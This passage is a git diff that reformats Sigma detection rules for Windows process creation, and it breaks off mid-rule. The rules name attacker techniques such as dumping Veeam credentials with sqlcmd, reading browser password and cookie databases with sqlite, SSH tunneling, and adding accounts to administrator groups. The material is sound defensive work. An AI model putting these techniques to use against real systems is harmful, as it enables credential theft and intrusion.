b/sigma/builtin/process_creation/proc_creation_win_sqlcmd_veeam_dump.yml index f252915cf..def9b718c 100644 --- a/sigma/builtin/process_creation/proc_creation_win_sqlcmd_veeam_dump.yml +++ b/sigma/builtin/process_creation/proc_creation_win_sqlcmd_veeam_dump.yml @@ -19,9 +19,9 @@ detection: EventID: 4688 Channel: Security selection_tools: - NewProcessName|endswith: \sqlcmd.exe + NewProcessName|endswith: \sqlcmd.exe selection_query: - CommandLine|contains|all: + CommandLine|contains|all: - SELECT - TOP - '[VeeamBackup].[dbo].[Credentials]' diff --git a/sigma/builtin/process_creation/proc_creation_win_sqlite_chromium_profile_data.yml b/sigma/builtin/process_creation/proc_creation_win_sqlite_chromium_profile_data.yml index 00d53234a..613a92b00 100644 --- a/sigma/builtin/process_creation/proc_creation_win_sqlite_chromium_profile_data.yml +++ b/sigma/builtin/process_creation/proc_creation_win_sqlite_chromium_profile_data.yml @@ -1,8 +1,7 @@ title: SQLite Chromium Profile Data DB Access id: 24c77512-782b-448a-8950-eddb0785fc71 status: test -description: Detect usage of the "sqlite" binary to query databases in Chromium-based - browsers for potential data stealing. +description: Detect usage of the "sqlite" binary to query databases in Chromium-based browsers for potential data stealing. references: - https://github.com/redcanaryco/atomic-red-team/blob/84d9edaaaa2c5511144521b0e4af726d1c7276ce/atomics/T1539/T1539.md#atomic-test-2---steal-chrome-cookies-windows - https://blog.cyble.com/2022/04/21/prynt-stealer-a-new-info-stealer-performing-clipper-and-keylogger-activities/ @@ -23,20 +22,20 @@ detection: EventID: 4688 Channel: Security selection_sql: - - Product: SQLite - - NewProcessName|endswith: - - \sqlite.exe - - \sqlite3.exe + - Product: SQLite + - NewProcessName|endswith: + - \sqlite.exe + - \sqlite3.exe selection_chromium: - CommandLine|contains: - - \User Data\ - - \Opera Software\ - - \ChromiumViewer\ + CommandLine|contains: + - \User Data\ # Most common folder for user profile data among Chromium browsers + - \Opera Software\ # Opera + - \ChromiumViewer\ # Sleipnir (Fenrir) selection_data: - CommandLine|contains: - - Login Data + CommandLine|contains: + - Login Data # Passwords - Cookies - - Web Data + - Web Data # Credit cards, autofill data - History - Bookmarks condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_sqlite_firefox_gecko_profile_data.yml b/sigma/builtin/process_creation/proc_creation_win_sqlite_firefox_gecko_profile_data.yml index e85d80fff..a532d81fe 100644 --- a/sigma/builtin/process_creation/proc_creation_win_sqlite_firefox_gecko_profile_data.yml +++ b/sigma/builtin/process_creation/proc_creation_win_sqlite_firefox_gecko_profile_data.yml @@ -1,8 +1,7 @@ title: SQLite Firefox Profile Data DB Access id: 4833155a-4053-4c9c-a997-777fcea0baa7 status: test -description: Detect usage of the "sqlite" binary to query databases in Firefox and - other Gecko-based browsers for potential data stealing. +description: Detect usage of the "sqlite" binary to query databases in Firefox and other Gecko-based browsers for potential data stealing. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1539/T1539.md#atomic-test-1---steal-firefox-cookies-windows - https://blog.cyble.com/2022/04/21/prynt-stealer-a-new-info-stealer-performing-clipper-and-keylogger-activities/ @@ -22,14 +21,14 @@ detection: EventID: 4688 Channel: Security selection_sql: - - Product: SQLite - - NewProcessName|endswith: - - \sqlite.exe - - \sqlite3.exe + - Product: SQLite + - NewProcessName|endswith: + - \sqlite.exe + - \sqlite3.exe selection_firefox: - CommandLine|contains: + CommandLine|contains: - cookies.sqlite - - places.sqlite + - places.sqlite # Bookmarks, history condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_squirrel_download.yml b/sigma/builtin/process_creation/proc_creation_win_squirrel_download.yml index 1dd87ac4f..59a0fe7b0 100644 --- a/sigma/builtin/process_creation/proc_creation_win_squirrel_download.yml +++ b/sigma/builtin/process_creation/proc_creation_win_squirrel_download.yml @@ -1,22 +1,18 @@ title: Arbitrary File Download Via Squirrel.EXE id: 1e75c1cc-c5d4-42aa-ac3d-91b0b68b3b4c related: - - id: 45239e6a-b035-4aaf-b339-8ad379fcb67e - type: similar - - id: fa4b21c9-0057-4493-b289-2556416ae4d7 - type: obsoletes + - id: 45239e6a-b035-4aaf-b339-8ad379fcb67e + type: similar + - id: fa4b21c9-0057-4493-b289-2556416ae4d7 + type: obsoletes status: experimental -description: 'Detects the usage of the "Squirrel.exe" to download arbitrary files. - This binary is part of multiple Electron based software installations (Slack, - Teams, Discord, etc.) - - ' +description: | + Detects the usage of the "Squirrel.exe" to download arbitrary files. This binary is part of multiple Electron based software installations (Slack, Teams, Discord, etc.) references: - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Squirrel/ - http://www.hexacorn.com/blog/2019/03/30/sqirrel-packages-manager-as-a-lolbin-a-k-a-many-electron-apps-are-lolbins-by-default/ - http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/ -author: Nasreddine Bencherchali (Nextron Systems), Karneades / Markus Neis, Jonhnathan - Ribeiro, oscd.community +author: Nasreddine Bencherchali (Nextron Systems), Karneades / Markus Neis, Jonhnathan Ribeiro, oscd.community date: 2022/06/09 modified: 2023/11/09 tags: @@ -31,19 +27,18 @@ detection: EventID: 4688 Channel: Security selection_img: - NewProcessName|endswith: + NewProcessName|endswith: - \squirrel.exe - \update.exe selection_download_cli: - CommandLine|contains: + CommandLine|contains: - ' --download ' - ' --update ' - ' --updateRollback=' selection_download_http_keyword: - CommandLine|contains: http + CommandLine|contains: http condition: process_creation and (all of selection_*) falsepositives: - - Expected FP with some Electron based applications such as (1Clipboard, Beaker - Browser, Caret, Discord, GitHub Desktop, etc.) + - Expected FP with some Electron based applications such as (1Clipboard, Beaker Browser, Caret, Discord, GitHub Desktop, etc.) level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_squirrel_proxy_execution.yml b/sigma/builtin/process_creation/proc_creation_win_squirrel_proxy_execution.yml index 66a8bc473..7b9ed78f7 100644 --- a/sigma/builtin/process_creation/proc_creation_win_squirrel_proxy_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_squirrel_proxy_execution.yml @@ -1,22 +1,18 @@ title: Process Proxy Execution Via Squirrel.EXE id: 45239e6a-b035-4aaf-b339-8ad379fcb67e related: - - id: 1e75c1cc-c5d4-42aa-ac3d-91b0b68b3b4c - type: similar - - id: fa4b21c9-0057-4493-b289-2556416ae4d7 - type: obsoletes + - id: 1e75c1cc-c5d4-42aa-ac3d-91b0b68b3b4c + type: similar + - id: fa4b21c9-0057-4493-b289-2556416ae4d7 + type: obsoletes status: experimental -description: 'Detects the usage of the "Squirrel.exe" binary to execute arbitrary - processes. This binary is part of multiple Electron based software installations - (Slack, Teams, Discord, etc.) - - ' +description: | + Detects the usage of the "Squirrel.exe" binary to execute arbitrary processes. This binary is part of multiple Electron based software installations (Slack, Teams, Discord, etc.) references: - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Squirrel/ - http://www.hexacorn.com/blog/2019/03/30/sqirrel-packages-manager-as-a-lolbin-a-k-a-many-electron-apps-are-lolbins-by-default/ - http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/ -author: Nasreddine Bencherchali (Nextron Systems), Karneades / Markus Neis, Jonhnathan - Ribeiro, oscd.community +author: Nasreddine Bencherchali (Nextron Systems), Karneades / Markus Neis, Jonhnathan Ribeiro, oscd.community date: 2022/06/09 modified: 2023/11/09 tags: @@ -31,47 +27,46 @@ detection: EventID: 4688 Channel: Security selection_img: - NewProcessName|endswith: + NewProcessName|endswith: - \squirrel.exe - \update.exe selection_exec: - CommandLine|contains: + CommandLine|contains: - --processStart - --processStartAndWait - --createShortcut filter_optional_discord: - CommandLine|contains|all: + CommandLine|contains|all: - :\Users\ - \AppData\Local\Discord\Update.exe - ' --processStart' - Discord.exe filter_optional_github_desktop: - CommandLine|contains|all: + CommandLine|contains|all: - :\Users\ - \AppData\Local\GitHubDesktop\Update.exe - GitHubDesktop.exe - CommandLine|contains: + CommandLine|contains: - --createShortcut - --processStartAndWait filter_optional_teams: - CommandLine|contains|all: + CommandLine|contains|all: - :\Users\ - \AppData\Local\Microsoft\Teams\Update.exe - Teams.exe - CommandLine|contains: + CommandLine|contains: - --processStart - --createShortcut filter_optional_yammer: - CommandLine|contains|all: + CommandLine|contains|all: - :\Users\ - \AppData\Local\yammerdesktop\Update.exe - Yammer.exe - CommandLine|contains: + CommandLine|contains: - --processStart - --createShortcut condition: process_creation and (all of selection_* and not 1 of filter_optional_*) falsepositives: - - Expected FP with some Electron based applications such as (1Clipboard, Beaker - Browser, Caret, Discord, GitHub Desktop, etc.) + - Expected FP with some Electron based applications such as (1Clipboard, Beaker Browser, Caret, Discord, GitHub Desktop, etc.) level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_ssh_port_forward.yml b/sigma/builtin/process_creation/proc_creation_win_ssh_port_forward.yml index d0b28c3a1..18801fad0 100644 --- a/sigma/builtin/process_creation/proc_creation_win_ssh_port_forward.yml +++ b/sigma/builtin/process_creation/proc_creation_win_ssh_port_forward.yml @@ -21,10 +21,10 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - ' -R ' - ' /R ' - NewProcessName|endswith: \ssh.exe + NewProcessName|endswith: \ssh.exe condition: process_creation and selection falsepositives: - Administrative activity using a remote port forwarding to a local port diff --git a/sigma/builtin/process_creation/proc_creation_win_ssh_rdp_tunneling.yml b/sigma/builtin/process_creation/proc_creation_win_ssh_rdp_tunneling.yml index 2b4253168..26d0e3916 100644 --- a/sigma/builtin/process_creation/proc_creation_win_ssh_rdp_tunneling.yml +++ b/sigma/builtin/process_creation/proc_creation_win_ssh_rdp_tunneling.yml @@ -1,11 +1,10 @@ title: Potential RDP Tunneling Via SSH id: f7d7ebd5-a016-46e2-9c54-f9932f2d386d related: - - id: f38ce0b9-5e97-4b47-a211-7dc8d8b871da - type: similar + - id: f38ce0b9-5e97-4b47-a211-7dc8d8b871da # plink.exe + type: similar status: test -description: Execution of ssh.exe to perform data exfiltration and tunneling through - RDP +description: Execution of ssh.exe to perform data exfiltration and tunneling through RDP references: - https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/ author: Nasreddine Bencherchali (Nextron Systems) @@ -22,8 +21,8 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: :3389 - NewProcessName|endswith: \ssh.exe + CommandLine|contains: :3389 + NewProcessName|endswith: \ssh.exe condition: process_creation and selection falsepositives: - Administrative activity diff --git a/sigma/builtin/process_creation/proc_creation_win_ssm_agent_abuse.yml b/sigma/builtin/process_creation/proc_creation_win_ssm_agent_abuse.yml index 54780bf3e..9f7dfb401 100644 --- a/sigma/builtin/process_creation/proc_creation_win_ssm_agent_abuse.yml +++ b/sigma/builtin/process_creation/proc_creation_win_ssm_agent_abuse.yml @@ -1,8 +1,7 @@ title: Potential Amazon SSM Agent Hijacking id: d20ee2f4-822c-4827-9e15-41500b1fff10 status: experimental -description: Detects potential Amazon SSM agent hijack attempts as outlined in the - Mitiga research report. +description: Detects potential Amazon SSM agent hijack attempts as outlined in the Mitiga research report. references: - https://www.mitiga.io/blog/mitiga-security-advisory-abusing-the-ssm-agent-as-a-remote-access-trojan - https://www.bleepingcomputer.com/news/security/amazons-aws-ssm-agent-can-be-used-as-post-exploitation-rat-malware/ @@ -21,12 +20,12 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - '-register ' - '-code ' - '-id ' - '-region ' - NewProcessName|endswith: \amazon-ssm-agent.exe + NewProcessName|endswith: \amazon-ssm-agent.exe condition: process_creation and selection falsepositives: - Legitimate activity of system administrators diff --git a/sigma/builtin/process_creation/proc_creation_win_stordiag_susp_child_process.yml b/sigma/builtin/process_creation/proc_creation_win_stordiag_susp_child_process.yml index f165b673b..ee91f48ce 100644 --- a/sigma/builtin/process_creation/proc_creation_win_stordiag_susp_child_process.yml +++ b/sigma/builtin/process_creation/proc_creation_win_stordiag_susp_child_process.yml @@ -1,8 +1,7 @@ title: Execution via stordiag.exe id: 961e0abb-1b1e-4c84-a453-aafe56ad0d34 status: test -description: Detects the use of stordiag.exe to execute schtasks.exe systeminfo.exe - and fltmc.exe +description: Detects the use of stordiag.exe to execute schtasks.exe systeminfo.exe and fltmc.exe references: - https://strontic.github.io/xcyclopedia/library/stordiag.exe-1F08FC87C373673944F6A7E8B18CD845.html - https://twitter.com/eral4m/status/1451112385041911809 @@ -21,12 +20,12 @@ detection: Channel: Security selection: ParentProcessName|endswith: \stordiag.exe - NewProcessName|endswith: + NewProcessName|endswith: - \schtasks.exe - \systeminfo.exe - \fltmc.exe filter: - ParentProcessName|startswith: + ParentProcessName|startswith: # as first is "Copy c:\windows\system32\stordiag.exe to a folder" - c:\windows\system32\ - c:\windows\syswow64\ condition: process_creation and (selection and not filter) diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_16bit_application.yml b/sigma/builtin/process_creation/proc_creation_win_susp_16bit_application.yml index 0a3d66f61..90f0751dd 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_16bit_application.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_16bit_application.yml @@ -1,9 +1,7 @@ title: Start of NT Virtual DOS Machine id: 16905e21-66ee-42fe-b256-1318ada2d770 status: test -description: Ntvdm.exe allows the execution of 16-bit Windows applications on 32-bit - Windows operating systems, as well as the execution of both 16-bit and 32-bit - DOS applications +description: Ntvdm.exe allows the execution of 16-bit Windows applications on 32-bit Windows operating systems, as well as the execution of both 16-bit and 32-bit DOS applications references: - https://docs.microsoft.com/en-us/windows/compatibility/ntvdm-and-16-bit-app-support - https://support.microsoft.com/fr-fr/topic/an-ms-dos-based-program-that-uses-the-ms-dos-protected-mode-interface-crashes-on-a-computer-that-is-running-windows-7-5dc739ea-987b-b458-15e4-d28d5cca63c7 @@ -22,7 +20,7 @@ detection: EventID: 4688 Channel: Security selection: - NewProcessName|endswith: + NewProcessName|endswith: - \ntvdm.exe - \csrstub.exe condition: process_creation and selection diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_abusing_debug_privilege.yml b/sigma/builtin/process_creation/proc_creation_win_susp_abusing_debug_privilege.yml index fbceb3abf..bf20ee27a 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_abusing_debug_privilege.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_abusing_debug_privilege.yml @@ -27,20 +27,20 @@ detection: - \wininit.exe - \spoolsv.exe - \searchindexer.exe - SubjectUserName|contains: + SubjectUserName|contains: # covers many language settings - AUTHORI - AUTORI selection_img: - - NewProcessName|endswith: - - \powershell.exe - - \pwsh.exe - - \cmd.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll - - Cmd.Exe + - NewProcessName|endswith: + - \powershell.exe + - \pwsh.exe + - \cmd.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll + - Cmd.Exe filter: - CommandLine|contains|all: + CommandLine|contains|all: - ' route ' - ' ADD ' condition: process_creation and (all of selection_* and not filter) diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_add_user_local_admin_group.yml b/sigma/builtin/process_creation/proc_creation_win_susp_add_user_local_admin_group.yml index 445fc75a5..a40823f92 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_add_user_local_admin_group.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_add_user_local_admin_group.yml @@ -1,11 +1,10 @@ title: Add User to Local Administrators Group id: ad720b90-25ad-43ff-9b5e-5c841facc8e5 related: - - id: ffa28e60-bdb1-46e0-9f82-05f7a61cc06e - type: similar + - id: ffa28e60-bdb1-46e0-9f82-05f7a61cc06e # Remote Desktop groups + type: similar status: test -description: Detects suspicious command line that adds an account to the local administrators/administrateurs - group +description: Detects suspicious command line that adds an account to the local administrators/administrateurs group references: - https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1 author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) @@ -22,16 +21,18 @@ detection: EventID: 4688 Channel: Security selection_main: - - CommandLine|contains|all: - - 'localgroup ' - - ' /add' - - CommandLine|contains|all: - - 'Add-LocalGroupMember ' - - ' -Group ' + - CommandLine|contains|all: + # net.exe + - 'localgroup ' + - ' /add' + - CommandLine|contains|all: + # powershell.exe + - 'Add-LocalGroupMember ' + - ' -Group ' selection_group: - CommandLine|contains: + CommandLine|contains: - ' administrators ' - - ' administrateur' + - ' administrateur' # Typo without an 'S' so we catch both condition: process_creation and (all of selection_*) falsepositives: - Administrative activity diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_add_user_remote_desktop_group.yml b/sigma/builtin/process_creation/proc_creation_win_susp_add_user_remote_desktop_group.yml index 0f9f16552..1b2145fe7 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_add_user_remote_desktop_group.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_add_user_remote_desktop_group.yml @@ -1,11 +1,10 @@ title: Suspicious Add User to Remote Desktop Users Group id: ffa28e60-bdb1-46e0-9f82-05f7a61cc06e related: - - id: ad720b90-25ad-43ff-9b5e-5c841facc8e5 - type: similar + - id: ad720b90-25ad-43ff-9b5e-5c841facc8e5 # Admin groups + type: similar status: test -description: Detects suspicious command line in which a user gets added to the local - Remote Desktop Users group +description: Detects suspicious command line in which a user gets added to the local Remote Desktop Users group references: - https://www.microsoft.com/security/blog/2021/11/16/evolving-trends-in-iranian-threat-actor-activity-mstic-presentation-at-cyberwarcon-2021/ author: Florian Roth (Nextron Systems) @@ -25,17 +24,17 @@ detection: EventID: 4688 Channel: Security selection_main: - - CommandLine|contains|all: - - 'localgroup ' - - ' /add' - - CommandLine|contains|all: - - 'Add-LocalGroupMember ' - - ' -Group ' + - CommandLine|contains|all: + - 'localgroup ' + - ' /add' + - CommandLine|contains|all: + - 'Add-LocalGroupMember ' + - ' -Group ' selection_group: - CommandLine|contains: + CommandLine|contains: - Remote Desktop Users - - "Utilisateurs du Bureau \xE0 distance" - - Usuarios de escritorio remoto + - Utilisateurs du Bureau à distance # French for "Remote Desktop Users" + - Usuarios de escritorio remoto # Spanish for "Remote Desktop Users" condition: process_creation and (all of selection_*) fields: - CommandLine diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_alternate_data_streams.yml b/sigma/builtin/process_creation/proc_creation_win_susp_alternate_data_streams.yml index b79f1cd79..501148724 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_alternate_data_streams.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_alternate_data_streams.yml @@ -1,8 +1,7 @@ title: Execute From Alternate Data Streams id: 7f43c430-5001-4f8b-aaa9-c3b88f18fa5c status: test -description: Detects execution from an Alternate Data Stream (ADS). Adversaries may - use NTFS file attributes to hide their malicious data in order to evade detection +description: Detects execution from an Alternate Data Stream (ADS). Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.004/T1564.004.md author: frack113 @@ -19,25 +18,25 @@ detection: EventID: 4688 Channel: Security selection_stream: - CommandLine|contains: 'txt:' + CommandLine|contains: 'txt:' selection_tools_type: - CommandLine|contains|all: + CommandLine|contains|all: - 'type ' - ' > ' selection_tools_makecab: - CommandLine|contains|all: + CommandLine|contains|all: - 'makecab ' - .cab selection_tools_reg: - CommandLine|contains|all: + CommandLine|contains|all: - 'reg ' - ' export ' selection_tools_regedit: - CommandLine|contains|all: + CommandLine|contains|all: - 'regedit ' - ' /E ' selection_tools_esentutl: - CommandLine|contains|all: + CommandLine|contains|all: - 'esentutl ' - ' /y ' - ' /d ' diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_always_install_elevated_windows_installer.yml b/sigma/builtin/process_creation/proc_creation_win_susp_always_install_elevated_windows_installer.yml index 34ad13b3c..42d5ee6af 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_always_install_elevated_windows_installer.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_always_install_elevated_windows_installer.yml @@ -1,8 +1,7 @@ title: Always Install Elevated Windows Installer id: cd951fdc-4b2f-47f5-ba99-a33bf61e3770 status: experimental -description: Detects Windows Installer service (msiexec.exe) trying to install MSI - packages with SYSTEM privilege +description: Detects Windows Installer service (msiexec.exe) trying to install MSI packages with SYSTEM privilege references: - https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-48-638.jpg author: Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community @@ -19,22 +18,22 @@ detection: EventID: 4688 Channel: Security selection_user: - SubjectUserName|contains: + SubjectUserName|contains: # covers many language settings - AUTHORI - AUTORI selection_image_1: - NewProcessName|contains|all: + NewProcessName|contains|all: - \Windows\Installer\ - msi - NewProcessName|endswith: tmp + NewProcessName|endswith: tmp selection_image_2: - NewProcessName|endswith: \msiexec.exe + NewProcessName|endswith: \msiexec.exe MandatoryLabel: S-1-16-16384 filter_installer: ParentProcessName: C:\Windows\System32\services.exe filter_repair: - - CommandLine|endswith: \system32\msiexec.exe /V - - ParentCommandLine|endswith: \system32\msiexec.exe /V + - CommandLine|endswith: \system32\msiexec.exe /V # ignore "repair option" + - ParentCommandLine|endswith: \system32\msiexec.exe /V # ignore "repair option" filter_sophos: ParentProcessName|startswith: C:\ProgramData\Sophos\ filter_avira: @@ -47,8 +46,7 @@ detection: ParentProcessName|startswith: - C:\Program Files\Google\Update\ - C:\Program Files (x86)\Google\Update\ - condition: process_creation and (1 of selection_image_* and selection_user and - not 1 of filter_*) + condition: process_creation and (1 of selection_image_* and selection_user and not 1 of filter_*) falsepositives: - System administrator usage - Anti virus products diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_appx_execution.yml b/sigma/builtin/process_creation/proc_creation_win_susp_appx_execution.yml index cdf4dba2a..b042cd6ae 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_appx_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_appx_execution.yml @@ -1,9 +1,7 @@ title: Potentially Suspicious Windows App Activity id: f91ed517-a6ba-471d-9910-b3b4a398c0f3 status: experimental -description: Detects potentially suspicious child process of applications launched - from inside the WindowsApps directory. This could be a sign of a rogue ".appx" - package installation/execution +description: Detects potentially suspicious child process of applications launched from inside the WindowsApps directory. This could be a sign of a rogue ".appx" package installation/execution references: - https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/ - https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/ @@ -20,9 +18,11 @@ detection: EventID: 4688 Channel: Security selection_parent: + # GrandParentImage|endswith: '\sihost.exe' ParentProcessName|contains: C:\Program Files\WindowsApps\ selection_susp_img: - NewProcessName|endswith: + NewProcessName|endswith: + # You can add more LOLBINs - \cmd.exe - \cscript.exe - \mshta.exe @@ -32,19 +32,19 @@ detection: - \rundll32.exe - \wscript.exe selection_susp_cli: - CommandLine|contains: + # You can add more potentially suspicious keywords + CommandLine|contains: - cmd /c - Invoke- - Base64 filter_optional_terminal: ParentProcessName|contains: :\Program Files\WindowsApps\Microsoft.WindowsTerminal ParentProcessName|endswith: \WindowsTerminal.exe - NewProcessName|endswith: + NewProcessName|endswith: - \powershell.exe - \cmd.exe - \pwsh.exe - condition: process_creation and (selection_parent and 1 of selection_susp_* and - not 1 of filter_optional_*) + condition: process_creation and (selection_parent and 1 of selection_susp_* and not 1 of filter_optional_*) falsepositives: - Legitimate packages that make use of external binaries such as Windows Terminal level: medium diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_arbitrary_shell_execution_via_settingcontent.yml b/sigma/builtin/process_creation/proc_creation_win_susp_arbitrary_shell_execution_via_settingcontent.yml index 88d1de483..d4ddb7a53 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_arbitrary_shell_execution_via_settingcontent.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_arbitrary_shell_execution_via_settingcontent.yml @@ -1,9 +1,7 @@ title: Arbitrary Shell Command Execution Via Settingcontent-Ms id: 24de4f3b-804c-4165-b442-5a06a2302c7e status: test -description: The .SettingContent-ms file type was introduced in Windows 10 and allows - a user to create "shortcuts" to various Windows 10 setting pages. These files - are simply XML and contain paths to various Windows 10 settings binaries. +description: The .SettingContent-ms file type was introduced in Windows 10 and allows a user to create "shortcuts" to various Windows 10 setting pages. These files are simply XML and contain paths to various Windows 10 settings binaries. references: - https://posts.specterops.io/the-tale-of-settingcontent-ms-files-f1ea253e4d39 author: Sreeman @@ -22,9 +20,9 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: .SettingContent-ms + CommandLine|contains: .SettingContent-ms filter: - CommandLine|contains: immersivecontrolpanel + CommandLine|contains: immersivecontrolpanel condition: process_creation and (selection and not filter) fields: - ParentProcess diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_archiver_iso_phishing.yml b/sigma/builtin/process_creation/proc_creation_win_susp_archiver_iso_phishing.yml index 827b9e323..394aa9f72 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_archiver_iso_phishing.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_archiver_iso_phishing.yml @@ -1,10 +1,7 @@ title: Phishing Pattern ISO in Archive id: fcdf69e5-a3d3-452a-9724-26f2308bf2b1 status: test -description: Detects cases in which an ISO files is opend within an archiver like - 7Zip or Winrar, which is a sign of phishing as threat actors put small ISO files - in archives as email attachments to bypass certain filters and protective measures - (mark of web) +description: Detects cases in which an ISO files is opend within an archiver like 7Zip or Winrar, which is a sign of phishing as threat actors put small ISO files in archives as email attachments to bypass certain filters and protective measures (mark of web) references: - https://twitter.com/1ZRR4H/status/1534259727059787783 - https://app.any.run/tasks/e1fe6a62-bce8-4323-a49a-63795d9afd5d/ @@ -25,13 +22,12 @@ detection: - \Winrar.exe - \7zFM.exe - \peazip.exe - NewProcessName|endswith: + NewProcessName|endswith: - \isoburn.exe - \PowerISO.exe - \ImgBurn.exe condition: process_creation and selection falsepositives: - - Legitimate cases in which archives contain ISO or IMG files and the user opens - the archive and the image via clicking and not extraction + - Legitimate cases in which archives contain ISO or IMG files and the user opens the archive and the image via clicking and not extraction level: high ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_automated_collection.yml b/sigma/builtin/process_creation/proc_creation_win_susp_automated_collection.yml index bcc9a6db6..e9ac4def5 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_automated_collection.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_automated_collection.yml @@ -1,8 +1,7 @@ title: Automated Collection Command Prompt id: f576a613-2392-4067-9d1a-9345fb58d8d1 status: test -description: Once established within a system or network, an adversary may use automated - techniques for collecting internal data. +description: Once established within a system or network, an adversary may use automated techniques for collecting internal data. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1119/T1119.md - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md @@ -22,7 +21,7 @@ detection: EventID: 4688 Channel: Security selection_ext: - CommandLine|contains: + CommandLine|contains: - .doc - .docx - .xls @@ -33,13 +32,13 @@ detection: - .pdf - .txt selection_other_dir: - CommandLine|contains|all: + CommandLine|contains|all: - 'dir ' - ' /b ' - ' /s ' selection_other_findstr: OriginalFileName: FINDSTR.EXE - CommandLine|contains: + CommandLine|contains: - ' /e ' - ' /si ' condition: process_creation and (selection_ext and 1 of selection_other_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_bad_opsec_sacrificial_processes.yml b/sigma/builtin/process_creation/proc_creation_win_susp_bad_opsec_sacrificial_processes.yml index 4faa4e6d3..b25ae0896 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_bad_opsec_sacrificial_processes.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_bad_opsec_sacrificial_processes.yml @@ -1,19 +1,13 @@ title: Bad Opsec Defaults Sacrificial Processes With Improper Arguments id: a7c3d773-caef-227e-a7e7-c2f13c622329 related: - - id: f5647edc-a7bf-4737-ab50-ef8c60dc3add - type: obsoletes + - id: f5647edc-a7bf-4737-ab50-ef8c60dc3add + type: obsoletes status: experimental -description: 'Detects attackers using tooling with bad opsec defaults. - - E.g. spawning a sacrificial process to inject a capability into the process without - taking into account how the process is normally run. - - One trivial example of this is using rundll32.exe without arguments as a sacrificial - process (default in CS, now highlighted by c2lint), running WerFault without arguments - (Kraken - credit am0nsec), and other examples. - - ' +description: | + Detects attackers using tooling with bad opsec defaults. + E.g. spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run. + One trivial example of this is using rundll32.exe without arguments as a sacrificial process (default in CS, now highlighted by c2lint), running WerFault without arguments (Kraken - credit am0nsec), and other examples. references: - https://blog.malwarebytes.com/malwarebytes-news/2020/10/kraken-attack-abuses-wer-service/ - https://www.cobaltstrike.com/help-opsec @@ -22,8 +16,7 @@ references: - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/rundll32 - https://docs.microsoft.com/en-us/dotnet/framework/tools/regasm-exe-assembly-registration-tool - https://docs.microsoft.com/en-us/dotnet/framework/tools/regsvcs-exe-net-services-installation-tool#feedback -author: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron - Systems), Christian Burkard (Nextron Systems) +author: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems) date: 2020/10/23 modified: 2023/12/02 tags: @@ -37,34 +30,34 @@ detection: EventID: 4688 Channel: Security selection_werfault: - 